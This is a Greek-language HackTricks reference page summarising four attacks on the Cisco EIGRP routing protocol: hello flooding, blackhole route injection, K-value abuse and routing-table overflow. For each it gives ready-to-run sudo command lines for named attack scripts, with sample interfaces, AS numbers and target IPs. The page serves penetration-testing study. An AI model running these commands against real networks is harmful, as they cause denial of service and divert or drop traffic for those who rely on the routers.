EIGRP Attacks
Reading time: 3 minutes
tip
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
Αυτή είναι μια περίληψη των επιθέσεων που εκτίθενται στο https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Ελέγξτε το για περισσότερες πληροφορίες.
Fake EIGRP Neighbors Attack
- Σκοπός: Να υπερφορτώσει τους επεξεργαστές των δρομολογητών πλημμυρίζοντάς τους με πακέτα EIGRP hello, ενδεχομένως οδηγώντας σε επίθεση Denial of Service (DoS).
- Εργαλείο: helloflooding.py script.
- Εκτέλεση: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
- Παράμετροι:
--interface
: Προσδιορίζει τη δικτυακή διεπαφή, π.χ.,eth0
.--as
: Ορίζει τον αριθμό αυτόνομου συστήματος EIGRP, π.χ.,1
.--subnet
: Ορίζει την τοποθεσία υποδικτύου, π.χ.,10.10.100.0/24
.
EIGRP Blackhole Attack
- Σκοπός: Να διαταράξει τη ροή της δικτυακής κίνησης εισάγοντας μια ψευδή διαδρομή, οδηγώντας σε μια μαύρη τρύπα όπου η κίνηση κατευθύνεται σε ανύπαρκτο προορισμό.
- Εργαλείο: routeinject.py script.
- Εκτέλεση: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
- Παράμετροι:
--interface
: Προσδιορίζει τη διεπαφή του συστήματος του επιτιθέμενου.--as
: Ορίζει τον αριθμό AS EIGRP.--src
: Ορίζει τη διεύθυνση IP του επιτιθέμενου.--dst
: Ορίζει τη διεύθυνση IP του υποδικτύου στόχου.--prefix
: Ορίζει τη μάσκα της διεύθυνσης IP του υποδικτύου στόχου.
Abusing K-Values Attack
- Σκοπός: Να δημιουργήσει συνεχείς διαταραχές και επανασυνδέσεις εντός του τομέα EIGRP εισάγοντας τροποποιημένες K-values, αποτελεσματικά οδηγώντας σε επίθεση DoS.
- Εργαλείο: relationshipnightmare.py script.
- Εκτέλεση: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
- Παράμετροι:
--interface
: Προσδιορίζει τη δικτυακή διεπαφή.--as
: Ορίζει τον αριθμό AS EIGRP.--src
: Ορίζει τη διεύθυνση IP ενός νόμιμου δρομολογητή.
Routing Table Overflow Attack
- Σκοπός: Να επιβαρύνει τον επεξεργαστή και τη RAM του δρομολογητή πλημμυρίζοντας τον πίνακα δρομολόγησης με πολλές ψευδείς διαδρομές.
- Εργαλείο: routingtableoverflow.py script.
- Εκτέλεση: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
- Παράμετροι:
--interface
: Προσδιορίζει τη δικτυακή διεπαφή.--as
: Ορίζει τον αριθμό AS EIGRP.--src
: Ορίζει τη διεύθυνση IP του επιτιθέμενου.
tip
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.